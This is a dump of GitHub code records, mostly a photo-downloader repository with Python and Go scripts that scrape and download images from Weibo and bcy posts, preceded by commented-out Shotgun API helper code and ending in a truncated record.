{\"type\":\"Project\",\"id\":project['id']},\n# 'code': shot,\n# 'task_template': template,\n# 'description': '',\n# 'sg_status_list': 'wtg' }\n#\n# result = sg.create( 'Shot', data )\n#\n# return result\n#\n#def sgNotesFind( sg, shotID ):\n# note = sg.find('Note',[['note_links','is',shotID]],['subject','content','created_at'],[{'field_name':'created_at','direction':'desc'}])\n# return note\n#\n#\n#def sgNotesFindLatest( sg, shotID ):\n# note = sg.find_one('Note',[['note_links','is',shotID]],['subject','content','created_at'],[{'field_name':'created_at','direction':'desc'}])\n# return note\n#\n#\n#def sgCreateNote(sg, project, shotID, subject, content):\n# # 
enter data here for a note to create\n# data = {'subject':subject,'content':content,'note_links':[shotID],'project':project}\n# # create the note\n# noteID = sg.create('Note',data)\n# return noteID\n#\n#\n## create a version\n#def sgCreateVersion( sg, project, shotID, verName, description, framePath, firstFrame, lastFrame, clientName='' ):\n# data = {'project':project,\n# 'code': verName,\n# 'description': description,\n# 'sg_path_to_frames': framePath,\n# 'frame_range': firstFrame + '-' + lastFrame,\n# #'sg_uploaded_movie': 'file.mov',\n# #'sg_first_frame': 1,\n# #'sg_last_frame': 100,\n# 'sg_status_list': 'rev',\n# 'entity': shotID}\n#\n# if clientName != '':\n# data['sg_client_name'] = clientName\n#\n# return sg.create('Version', data)\n#\n#\n##add a task version to the system\n#def sgCreateVersionTask(sg, project, shotID, verName, description, framePath, firstFrame, lastFrame, task):\n# filters = [['content','is',task],['entity','is',shot]]\n# taskID = sg.find_one('Task',filters)\n# data = {'project': project,\n# 'code': verName,\n# 'description': description,\n# 'sg_path_to_frames': framePath,\n# 'frame_range': firstFrame + '-' + lastFrame,\n# #'sg_uploaded_movie': '/Users/throb/Downloads/test.m4v',\n# #'sg_first_frame': 1,\n# #'sg_last_frame': 100,\n# 'sg_status_list': 'rev',\n# 'sg_task': taskID,\n# \n# 'entity': shotID} \n# # in case we're putting a client version in here we need this code.\n# # we are expecting a field called sg_client_name in the version table.\n# # please make sure you create this in the shotgun setup\n# #'user': {'type':'HumanUser', 'id':165} }\n# return sg.create('Version',data)\n#\n#\n## look for versions in a shot:\n#def sgVersionFind(sg, shotID):\n# return sg.find('Version',[['entity','is',shotID]],['code','task','sg_path_to_frames'])\n#\n#\n## search for the latest task given shotID and task info\n#def sgVersionFindLatestTask(sg, shotID, task):\n# # first look for the task and get the ID\n# filters = [['content','is',task],['entity','is',shotID]]\n# taskID = sg.find_one('Task',filters)\n# # then look for the latest \n# #version using the task ID. note that we need to use the [0] or else we're sending the array versus the hash\n# versionLatest = sg.find_one('Version',[['entity','is',shotID],['sg_task','is',taskID]],['code','sg_task','sg_path_to_frames'],[{'field_name':'created_at','direction':'desc'}])\n# return versionLatest\n#\n#\n## look for latest comp version\n### can deprecate since there is a way to get latest version including task type above\n#'''\n#def sgVersionFindLatestComp(sg, shotID):\n# # first look for the task and get the ID\n# filters = [['content','is','Comp'],['entity','is',shotID]]\n# taskID = sg.find('Task',filters)\n# # then look for the latest \n# #version using the task ID. 
note that we need to use the [0] or else we're sending the array versus the hash\n# versionComp = sg.find_one('Version',[['entity','is',shotID],['sg_task','is',taskID[0]]],['code','sg_task','sg_path_to_frames'],[{'field_name':'created_at','direction':'desc'}])\n# return versionComp\n#'''\n#\n### The following requires a field called \"client_version\" be added to shotgun\n#def sgVersionClientUpate (sg, shotID, version):\n# data = { 'sg_client_version': version}\n# result = sg.update('Shot', shotID['id'], data)\n# return result\n#\n## connect to shotgun and get the latest \"client version\" number\n#def sgGetClientVersion (sg, currShot):\n# '''sg = shotgunConnect()\n# sgproject = sgProject(sg, getJob(input))\n# currShot = getSeq(input) + '_' + getShot(input)\n# '''\n# sgshot = sgShot(sg, currShot)\n# try :\n# currentVersion = sgshot['sg_client_version']\n# except : \n# currentVersion = 0\n# return currentVersion\n\n\n" } ]
2
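The Shotgun helpers in the record above (GetProject, GetShotInfo, GetLatestNote, and friends) all wrap one query shape: find_one(entity_type, filters, fields, order). A minimal self-contained sketch of that shape follows; the server URL, script credentials, project name, and shot id are placeholder assumptions, not values from the repo.

from shotgun_api3.shotgun import Shotgun

# Placeholder credentials; the repo's SetShotgun() leaves these empty.
sg = Shotgun("https://example.shotgunstudio.com", "script_name", "script_api_key")

# Same filter/field shape as GetProject above.
project = sg.find_one("Project", [["name", "is", "MyShow"]], ["name"])

# Same filter/sort shape as GetLatestNote above: newest note linked to a shot.
latest_note = sg.find_one(
    "Note",
    [["project", "is", project],
     ["note_links", "is", {"type": "Shot", "id": 1234}]],  # 1234 is a made-up shot id
    ["subject", "content"],
    [{"field_name": "created_at", "direction": "desc"}],   # sort newest first
)
print(latest_note)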
AnestLarry/photo_downloader
https://github.com/AnestLarry/photo_downloader
08b398db27caf97105a9c409a61efddee9ef3796
0439d705fc235599d8c830f13150e8b1b4398c7b
d53f2ff7e9a0487457beac2e3946b0c533e31600
refs/heads/master
2021-07-05T01:36:33.821787
2020-08-10T00:59:40
2020-08-10T00:59:40
148,917,103
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6416666507720947, "alphanum_fraction": 0.644444465637207, "avg_line_length": 26.69230842590332, "blob_id": "5c99b3bd60942a6883b622f3aec0c8897f8677b0", "content_id": "fc5c6fb3a61aff59fc26e65560420fcfae8f1e24", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "permissive", "max_line_length": 99, "num_lines": 13, "path": "/weibo.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import subprocess as sp\nimport sys\n\np = sp.Popen([sys.executable, \"weibo_output.py\"],\n stdin=sp.PIPE, bufsize=1, universal_newlines=True,creationflags=sp.CREATE_NEW_CONSOLE)\nwhile True:\n keyword=input(\"\\nweibo url :\")\n if not keyword:\n continue\n p.stdin.write(keyword+\"\\n\")\n p.stdin.flush()\n if keyword==\"exit\":\n break\n" }, { "alpha_fraction": 0.5471698045730591, "alphanum_fraction": 0.5567330121994019, "avg_line_length": 28.534351348876953, "blob_id": "42150342808e964db0d5d4cc864138f60a464eb8", "content_id": "7a35e5f99ac98f0ca4c479a32c40787d1b7d4eb9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3869, "license_type": "permissive", "max_line_length": 94, "num_lines": 131, "path": "/weibo_output.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "# Version : 2.5\nimport re\nimport timelib\nimport Threadinglib\nimport json\nimport os\nfrom collections import deque\nimport requests\nimport threading\nimport sys\nfrom queue import Queue\n\n\ndef handle_url(url: str):\n return \"https://m.weibo.cn/status\"+url[url.rindex(\"/\"):]\n\n\ndef download_beta(path=\"\", iter=\"\"):\n while iter:\n iter_data = iter.popleft()\n try:\n with open(path+\"/\" + path + \"__\"+str(iter_data[0])+\".jpg\", \"wb\") as photo_file:\n photo = requests.get(iter_data[1], timeout=30).content\n photo_data = photo\n photo_file.write(photo_data)\n photo_file.flush()\n #photo_data = photo.read()\n except IOError:\n print(iter_data[0], \" file is downloaded.\")\n print(iter_data[0], \"file is downloaded.\")\n\n\ndef repair(path):\n import os\n print(path+\"/\"+path+\"_url.txt\")\n with open(path+\"/\"+path+\"_url.txt\", \"r\") as url_file:\n url = handle_url(json.loads(url_file.read())[\"mobile\"])\n res = requests.get(url, timeout=30)\n txt: str = res.text\n jpg_list = get_jpg_list(txt)\n if not jpg_list:\n print(jpg_list)\n raise \"not url in it\"\n jpg_list_emu = list()\n for i in enumerate(jpg_list):\n jpg_list_emu.append([i[0]+1, \"http://wx3.sinaimg.cn/large/\"+i[1]])\n re_download = []\n for i in jpg_list_emu:\n if not os.path.exists(path+\"/\" + path + \"__\"+str(i[0])+\".jpg\"):\n re_download += [i]\n re_download_de_iterator = deque(re_download)\n print(re_download_de_iterator)\n @timelib.Timelog\n def repair_now():\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*3, [[path, re_download_de_iterator]]*3))\n\n\ndef get_jpg_list(txt: str):\n jpg_list = re.compile(\n '\\\"url\\\"\\: \\\"https\\://wx[0-9]\\.sinaimg\\.cn/large/([./A-z0-9]*)\\\",', re.S).findall(txt)\n print(jpg_list)\n return jpg_list\n\n\ndef log(path, data):\n try:\n if data.replace(\"\\n\", \"\"):\n open(path+\"/\"+path+\"__log.log\", \"a\").write(data)\n print(\"log succ\")\n except IOError:\n print(\"Error: \"+str(IOError))\n\n\ndef Main(key: str):\n if key[:4] == \"http\":\n try:\n url = handle_url(key[:key.index(\"?\")])\n key = key[:key.index(\"?\")]\n except:\n url = 
handle_url(key)\n else:\n repair(key)\n return None\n txt = requests.get(url, timeout=10)\n txt = txt.text\n jpg_list = get_jpg_list(txt)\n if not jpg_list:\n return None\n jpg_list_emu = list()\n logdata = dict()\n for i in enumerate(jpg_list):\n jpg_list_emu.append([i[0]+1, \"http://wx3.sinaimg.cn/large/\" + i[1]])\n logdata[i[0]+1] = \"http://wx3.sinaimg.cn/large/\" + i[1]\n jpg_url_de_iterator = deque(jpg_list_emu)\n\n @timelib.Timelog\n def download_now():\n path = timelib.Showtime(r\"$year-$mon-$day--$hour-$min-$sec\")\n os.mkdir(path)\n log(path, json.dumps(logdata))\n with open(path+\"/\"+path+\"_url.txt\", \"w\") as url_file:\n url_file.write(json.dumps(dict({\"mobile\": url, \"origan\": key})))\n if len(jpg_list) > 2:\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*3, [[path, jpg_url_de_iterator]]*3))\n else:\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*2, [[path, jpg_url_de_iterator]]*2))\n return None\n\n\ndef rec(q: Queue):\n for line in sys.stdin:\n q.put(line.replace(\"\\n\", \"\"))\n\n\ndef work(q: Queue):\n while True:\n if not q.empty():\n key = q.get()\n Main(key)\n\n\nif __name__ == \"__main__\":\n q = Queue()\n threading.Thread(target=rec, args=(q,)).start()\n w = threading.Thread(target=work, args=(q,))\n w.start()\n w.join()\n exit()\n" }, { "alpha_fraction": 0.5989257097244263, "alphanum_fraction": 0.6154879331588745, "avg_line_length": 22.030927658081055, "blob_id": "e6811a0602fc65bfe911f838c6bf0019abbd9d95", "content_id": "aaa9317bdd1c7ca8b1e2cd13371cf476d71c068c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2234, "license_type": "permissive", "max_line_length": 66, "num_lines": 97, "path": "/pd_go/bcy.go", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\tWorker \"pd_go/worker\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n)\n\nvar w sync.WaitGroup\n\nfunc main() {\n\tq := Worker.NewQueue()\n\tfmt.Println(\"bcy photo downloader is working ...\")\n\tfor i := 1; i < 5; i++ {\n\t\tgo Worker.Work(q, int32(i))\n\t\tfmt.Printf(\"Worker[%d] has waitting ...\\n\", i)\n\t}\n\tfor {\n\t\tinputUrl := \"\"\n\t\tfmt.Scanln(&inputUrl)\n\t\tif inputUrl[:4] != \"http\" {\n\t\t\tWorker.Repair(inputUrl, q)\n\t\t\tcontinue\n\t\t}\n\t\tbody, e := Worker.GET(inputUrl, nil)\n\t\tif e != 200 {\n\t\t\tfmt.Printf(\"Get Page Error. 
Status Code %d\\n\", e)\n\t\t}\n\t\t//txt, _ := utf8.DecodeRune(body)\n\t\tvar imageList []string\n\t\tWorker.ProtectRun(func() {\n\t\t\timageList = getImageList(body)\n\t\t})\n\t\tif len(imageList) == 0 {\n\t\t\tfmt.Println(\"No image link.\")\n\t\t\tcontinue\n\t\t}\n\t\tlogData := make(map[string]string, 0)\n\n\t\ttimeStr := time.Now().Format(\"2006-01-02--15-04-05\")\n\t\tos.Mkdir(timeStr, 0644)\n\t\tif strings.Contains(inputUrl, \"?\") {\n\t\t\tsaveToFile(\n\t\t\t\tfmt.Sprintf(\"%s/%s__url.txt\", timeStr, timeStr),\n\t\t\t\t[]byte(inputUrl[:strings.LastIndex(inputUrl, \"?\")]))\n\t\t} else {\n\t\t\tsaveToFile(\n\t\t\t\tfmt.Sprintf(\"%s/%s__url.txt\", timeStr, timeStr),\n\t\t\t\t[]byte(inputUrl))\n\t\t}\n\t\tfor i := 0; i < len(imageList); i++ {\n\t\t\tlogData[strconv.Itoa(i)] = imageList[i]\n\t\t\tq.AppendValue([]string{strconv.Itoa(i), imageList[i], timeStr})\n\t\t}\n\t\tfmt.Printf(\"Enqueue %d task(s) in the queue.\", len(imageList))\n\t\tlogDataJson, _ := json.Marshal(logData)\n\t\tsaveToFile(fmt.Sprintf(\"%s/%s__log.txt\", timeStr, timeStr),\n\t\t\tlogDataJson)\n\t\t//fmt.Println(inputUrl)\n\t}\n}\n\nfunc getImageList(txt []byte) []string {\n\timageList := make([]string, 0)\n\tr := regexp.MustCompile(\"\\\\\\\\\\\"multi\\\\\\\\\\\":(\\\\[[^\\\\]]+\\\\])\")\n\n\trawJson := r.FindStringSubmatch(string(txt))[1]\n\n\tjsons := make([]map[string]interface{}, 0)\n\n\ts, e := strconv.Unquote(fmt.Sprintf(\"\\\"%s\\\"\", rawJson))\n\t////s,e := strconv.Unquote(rawJson)\n\tif e != nil {\n\t\tfmt.Println(e.Error())\n\t}\n\trawJson = s\n\n\terr := json.Unmarshal([]byte(rawJson), &jsons)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t}\n\n\tfor _, v := range jsons {\n\t\timageList = append(imageList, v[\"original_path\"].(string))\n\t}\n\treturn imageList\n}\nfunc saveToFile(path string, body []byte) {\n\tioutil.WriteFile(path, body, 0644)\n}\n" }, { "alpha_fraction": 0.6187800765037537, "alphanum_fraction": 0.6243980526924133, "avg_line_length": 29.414634704589844, "blob_id": "00c7381670999233fd2b07d826d0bf8d57b3d7f1", "content_id": "4d79c8870886d15799796f5ceef321bc5f3954ae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1246, "license_type": "permissive", "max_line_length": 87, "num_lines": 41, "path": "/Threadinglib.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import threading,time\ndef Multithreading_Run(function=[],functionkey=[]):\n \"\"\"function : which function(def) need to run ,must be a list\n functionkey : key of function,must be a bivariate table\"\"\"\n subthreadinglist=[\"\"]*len(function)\n \n i=0\n while i < len(subthreadinglist):\n subthreadinglist[i] = threading.Thread(target=function[i], args=functionkey[i])\n i+=1\n for i in subthreadinglist:\n time.sleep(0.1)\n i.start()\n return subthreadinglist\n \ndef Delay_Threading_To_Exit(subthreadinglist=[],Delaytime=1,tips=False):\n \"\"\"subthreadinglist: which list of need to delay\n Delaytime: Delay seconds\n tips: True to print Finished in the end \"\"\"\n i=0\n while i<len(subthreadinglist):\n if subthreadinglist[i].is_alive():\n time.sleep(Delaytime)\n else:\n i+=1\n if tips:\n print(\"Finished\")\n return True\n \ndef Check_Threading_isalive(subthreadinglist=[]):\n \"\"\"subthreadinglist: which need to check \"\"\"\n threadingstatus=[]\n for i in subthreadinglist:\n if i.is_alive():\n threadingstatus+=[True]\n else:\n threadingstatus+=[False]\n return threadingstatus\n \nif __name__ == \"__main__\":\n pass" }, { 
"alpha_fraction": 0.557079553604126, "alphanum_fraction": 0.5699514746665955, "avg_line_length": 17.51171875, "blob_id": "03e109764d8c7e5c8d32d24742851d0b7253daec", "content_id": "bbfa3e90017b6c4f99f2c528a113047e6fee7376", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 5319, "license_type": "permissive", "max_line_length": 104, "num_lines": 256, "path": "/pd_go/Libs/Libs.go", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "package Libs\n\nimport (\n\t\"bufio\"\n\t\"bytes\"\n\t\"crypto/sha1\"\n\t\"encoding/hex\"\n\t\"fmt\"\n\t\"io\"\n\t\"log\"\n\t\"os\"\n\t\"os/exec\"\n\t\"reflect\"\n\t\"runtime\"\n)\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n// 20201\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n\nfunc LibsXClear__20201() {\n\tswitch runtime.GOOS {\n\tcase \"windows\":\n\t\tcmd := exec.Command(\"cmd\", \"/c\", \"cls\")\n\t\tcmd.Stdout = os.Stdout\n\t\tcmd.Run()\n\tcase \"darwin\":\n\t\tfallthrough\n\tcase \"linux\":\n\t\tcmd := exec.Command(\"clear\")\n\t\tcmd.Stdout = os.Stdout\n\t\tcmd.Run()\n\t}\n}\n\nfunc LibsXIsFile__20201(path string) bool {\n\ts, err := os.Stat(path)\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn !s.IsDir()\n}\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n// History\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n\nfunc LibsXRangeInt(args ...int) chan int {\n\tif l := len(args); l < 1 || l > 3 {\n\t\tfmt.Println(\"error args length, xRangeInt requires 1-3 int arguments\")\n\t}\n\tvar start, stop int\n\tvar step int = 1\n\tswitch len(args) {\n\tcase 1:\n\t\tstop = args[0]\n\t\tstart = 0\n\tcase 2:\n\t\tstart, stop = args[0], args[1]\n\tcase 3:\n\t\tstart, stop, step = args[0], args[1], args[2]\n\t}\n\n\tch := make(chan int)\n\tgo func() {\n\t\tif step > 0 {\n\t\t\tfor start < stop {\n\t\t\t\tch <- start\n\t\t\t\tstart = start + step\n\t\t\t}\n\t\t} else {\n\t\t\tfor start > stop {\n\t\t\t\tch <- start\n\t\t\t\tstart = start + step\n\t\t\t}\n\t\t}\n\t\tclose(ch)\n\t}()\n\n\treturn ch\n}\n\nfunc LibsXClear() {\n\tcmd := exec.Command(\"cmd\", \"/c\", \"cls\")\n\tcmd.Stdout = os.Stdout\n\tcmd.Run()\n}\n\n// 判断所给路径文件/文件夹是否存在\nfunc LibsXExists(path string) bool {\n\t_, err := os.Stat(path) //os.Stat获取文件信息\n\tif err != nil {\n\t\tif os.IsExist(err) {\n\t\t\treturn true\n\t\t}\n\t\treturn false\n\t}\n\treturn true\n}\n\n// 判断所给路径是否为文件夹\nfunc LibsXIsDir(path string) bool {\n\ts, err := os.Stat(path)\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn s.IsDir()\n}\n\n// 判断所给路径是否为文件\nfunc LibsXIsFile(path string) bool {\n\treturn !LibsXIsDir(path)\n}\n\nfunc LibsXSha1File(filePath string) []byte {\n\tf, err := os.Open(filePath)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer f.Close()\n\n\th := sha1.New()\n\tif _, err := io.Copy(h, f); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn h.Sum(nil)\n}\n\nfunc LibsXSha1FileString(filePath string) string {\n\tf, err := os.Open(filePath)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer f.Close()\n\n\th := sha1.New()\n\tif _, err := io.Copy(h, f); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn hex.EncodeToString(h.Sum(nil))\n}\n\nfunc LibsXexecCommand(commandName string, params []string) bool {\n\t//函数返回一个*Cmd,用于使用给出的参数执行name指定的程序\n\tcmd := exec.Command(commandName, 
params...)\n\n\t//显示运行的命令\n\t//fmt.Println(cmd.Args)\n\t//StdoutPipe方法返回一个在命令Start后与命令标准输出关联的管道。Wait方法获知命令结束后会关闭这个管道,一般不需要显式的关闭该管道。\n\tstdout, err := cmd.StdoutPipe()\n\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn false\n\t}\n\n\tcmd.Start()\n\t//创建一个流来读取管道内内容,这里逻辑是通过一行一行的读取的\n\treader := bufio.NewReader(stdout)\n\n\t//实时循环读取输出流中的一行内容\n\tfor {\n\t\tline, err2 := reader.ReadString('\\n')\n\t\tif err2 != nil || io.EOF == err2 {\n\t\t\tbreak\n\t\t}\n\t\tfmt.Println(line)\n\t}\n\n\t//阻塞直到该命令执行完成,该命令必须是被Start方法开始执行的\n\tcmd.Wait()\n\treturn true\n}\n\nfunc LibsXExecShell(commandName string, params []string) {\n\t// stdout,stderr\n\t//函数返回一个*Cmd,用于使用给出的参数执行name指定的程序\n\tcmd := exec.Command(commandName, params...)\n\n\t//读取io.Writer类型的cmd.Stdout,再通过bytes.Buffer(缓冲byte类型的缓冲器)将byte类型转化为string类型(out.String():这是bytes类型提供的接口)\n\tvar out bytes.Buffer\n\tw := bytes.NewBuffer(nil)\n\tcmd.Stderr = w\n\tcmd.Stdout = &out\n\n\t//Run执行c包含的命令,并阻塞直到完成。 这里stdout被取出,cmd.Wait()无法正确获取stdin,stdout,stderr,则阻塞在那了\n\tcmd.Run()\n\n\touts, ws := out.String(), w.String()\n\tif ws != \"\" {\n\t\tfmt.Println(ws)\n\t} else {\n\t\tfmt.Println(outs)\n\t}\n}\n\nfunc LibsXContains(array interface{}, val interface{}) (index int) {\n\tindex = -1\n\tswitch reflect.TypeOf(array).Kind() {\n\tcase reflect.Slice:\n\t\t{\n\t\t\ts := reflect.ValueOf(array)\n\t\t\tfor i := 0; i < s.Len(); i++ {\n\t\t\t\tif reflect.DeepEqual(val, s.Index(i).Interface()) {\n\t\t\t\t\tindex = i\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsStrings(array []string, val string) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsFloat64(array []float64, val float64) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsBools(array []bool, val bool) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsInt64(array []int64, val int64) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n" }, { "alpha_fraction": 0.49157965183258057, "alphanum_fraction": 0.5025261044502258, "avg_line_length": 34.35118865966797, "blob_id": "5e94ca644971d664b4c8a0544cdfc5090f0a0e78", "content_id": "b02648a24f1ae79b36f72b802301c59b064dd4ba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5938, "license_type": "permissive", "max_line_length": 153, "num_lines": 168, "path": "/url_lib.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import time , http.client , re , sys\n\nclass url_lib:\n def __init__(self,url=\"url str\"):\n if url[:4] == \"http\":\n self.url=url\n else:\n self.url=\"\"\n self.Headers={\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\",\n }\n \n def Get(self,key=[[\"key\",\"value\"]],port=80,url=None):\n if not url:\n url=self.url\n HTTPS_FLAG=False\n if url[-1]!=\"?\":\n url+=\"?\"\n if r\"http://\" in url:\n host=re.compile(r\"http://[^/]*\").findall(url)[0].replace(\"http://\",\"\")\n elif r\"https://\" in url:\n host=re.compile(r\"https://[^/]*\").findall(url)[0].replace(\"https://\",\"\")\n port=443\n 
HTTPS_FLAG=True\n for i in key:\n url +=\"&\" + i[0] + \"=\" + i[1]\n if HTTPS_FLAG:\n h=http.client.HTTPSConnection(host,port)\n else:\n h=http.client.HTTPConnection(host,port)\n h.request(\"GET\",url,headers=self.Headers)\n return h.getresponse()\n\n def Post(self,data={\"keyname\":\"keyword\",},port=80,url=None):\n if not url:\n url=self.url\n HTTPS_FLAG=False\n if r\"http://\" in url:\n host=re.compile(r\"http://[^/]*\").findall(url)[0].replace(\"http://\",\"\")\n elif r\"https://\" in url:\n host=re.compile(r\"https://[^/]*\").findall(url)[0].replace(\"https://\",\"\")\n port=443\n HTTPS_FLAG=True\n post_data_str = urlencode(data)\n\n if HTTPS_FLAG:\n h=http.client.HTTPSConnection(host,port)\n else:\n h=http.client.HTTPConnection(host,port)\n h.request(\"POST\",url,post_data_str,headers=self.Headers)\n return h.getresponse()\n \n def Head(self,port=80,url=None):\n url=self.url\n host=re.compile(r\"http://[^/]*\").findall(url)[0].replace(\"http://\",\"\")\n h=http.client.HTTPConnection(host,port)\n h.request(\"HEAD\",url,headers=self.Headers)\n res=h.getresponse()\n h.close();h=None\n return res.getheaders()\n\n\n\n_ALWAYS_SAFE = frozenset(b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n b'abcdefghijklmnopqrstuvwxyz'\n b'0123456789'\n b'_.-')\n_ALWAYS_SAFE_BYTES = bytes(_ALWAYS_SAFE)\ndef quote(string, safe='/', encoding=None, errors=None):\n if isinstance(string, str):\n if not string:\n return string\n if encoding is None:\n encoding = 'utf-8'\n if errors is None:\n errors = 'strict'\n string = string.encode(encoding, errors)\n else:\n if encoding is not None:\n raise TypeError(\"quote() doesn't support 'encoding' for bytes\")\n if errors is not None:\n raise TypeError(\"quote() doesn't support 'errors' for bytes\")\n return quote_from_bytes(string, safe)\n\ndef quote_plus(string, safe='', encoding=None, errors=None):\n if ((isinstance(string, str) and ' ' not in string) or\n (isinstance(string, bytes) and b' ' not in string)):\n return quote(string, safe, encoding, errors)\n if isinstance(safe, str):\n space = ' '\n else:\n space = b' '\n string = quote(string, safe + space, encoding, errors)\n return string.replace(' ', '+')\n\ndef quote_from_bytes(bs, safe='/'):\n if not isinstance(bs, (bytes, bytearray)):\n raise TypeError(\"quote_from_bytes() expected bytes\")\n if not bs:\n return ''\n if isinstance(safe, str):\n safe = safe.encode('ascii', 'ignore')\n else:\n safe = bytes([c for c in safe if c < 128])\n if not bs.rstrip(_ALWAYS_SAFE_BYTES + safe):\n return bs.decode()\n try:\n quoter = _safe_quoters[safe]\n except KeyError:\n _safe_quoters[safe] = quoter = Quoter(safe).__getitem__\n return ''.join([quoter(char) for char in bs])\n\ndef urlencode(query, doseq=False, safe='', encoding=None, errors=None,\n quote_via=quote_plus):\n\n if hasattr(query, \"items\"):\n query = query.items()\n else:\n try:\n if len(query) and not isinstance(query[0], tuple):\n raise TypeError\n except TypeError:\n ty, va, tb = sys.exc_info()\n raise TypeError(\"not a valid non-string sequence \"\n \"or mapping object\").with_traceback(tb)\n\n l = []\n if not doseq:\n for k, v in query:\n if isinstance(k, bytes):\n k = quote_via(k, safe)\n else:\n k = quote_via(str(k), safe, encoding, errors)\n\n if isinstance(v, bytes):\n v = quote_via(v, safe)\n else:\n v = quote_via(str(v), safe, encoding, errors)\n l.append(k + '=' + v)\n else:\n for k, v in query:\n if isinstance(k, bytes):\n k = quote_via(k, safe)\n else:\n k = quote_via(str(k), safe, encoding, errors)\n\n if isinstance(v, bytes):\n v = quote_via(v, safe)\n 
l.append(k + '=' + v)\n elif isinstance(v, str):\n v = quote_via(v, safe, encoding, errors)\n l.append(k + '=' + v)\n else:\n try:\n # Is this a sufficient test for sequence-ness?\n x = len(v)\n except TypeError:\n # not a sequence\n v = quote_via(str(v), safe, encoding, errors)\n l.append(k + '=' + v)\n else:\n # loop over the sequence\n for elt in v:\n if isinstance(elt, bytes):\n elt = quote_via(elt, safe)\n else:\n elt = quote_via(str(elt), safe, encoding, errors)\n l.append(k + '=' + elt)\n return '&'.join(l)" }, { "alpha_fraction": 0.47103825211524963, "alphanum_fraction": 0.47759562730789185, "avg_line_length": 32.814815521240234, "blob_id": "e4a3bf434108a342d120e15dd5dd43dbc2da1db3", "content_id": "196a826c575cf08326fa94ea93e40fef4ddd5690", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 915, "license_type": "permissive", "max_line_length": 71, "num_lines": 27, "path": "/weibo_0.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import url_lib , re ,timelib ,os\n\nub = url_lib.url_lib()\nwhile True: \n ub.url = input(\"url \")\n with open(\"Cookie.txt\",\"r\") as c: \n ub.Headers[\"Cookie\"]=c.read()\n txt=ub.Get().read().decode(\"utf-8\")\n jpg_list = re.compile(r'[^%\\\\\\/\\.]*\\.jpg\\\\\">').findall(txt)\n @timelib.Timelog\n def download_now():\n pre_url_str=\"http://wx3.sinaimg.cn/large/\"\n path=timelib.Showtime(\"$year-$mon-$day--$hour-$min-$sec\")\n os.system(\"mkdir \"+path)\n n=1\n for i in jpg_list :\n ub.url=pre_url_str+i[:-3]\n try:\n photo=ub.Get().read()\n with open(path+\"/\"+str(n)+\".jpg\" ,\"wb\" ) as photo_file:\n photo_file.write(photo)\n except IOError:\n print(IOError,\"\\n\",str(n)+\" file fail\")\n n+=1\n continue\n print(n,\" file is downloaded.\")\n n+=1\n\n\n" }, { "alpha_fraction": 0.5838509202003479, "alphanum_fraction": 0.6052795052528381, "avg_line_length": 22.165468215942383, "blob_id": "91f647afca5b0e18419e538da02c0b13f200f754", "content_id": "a3ac3564ea40cd614649ff7f2d7b31c54430bcf7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3244, "license_type": "permissive", "max_line_length": 108, "num_lines": 139, "path": "/pd_go/worker/worker.go", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": 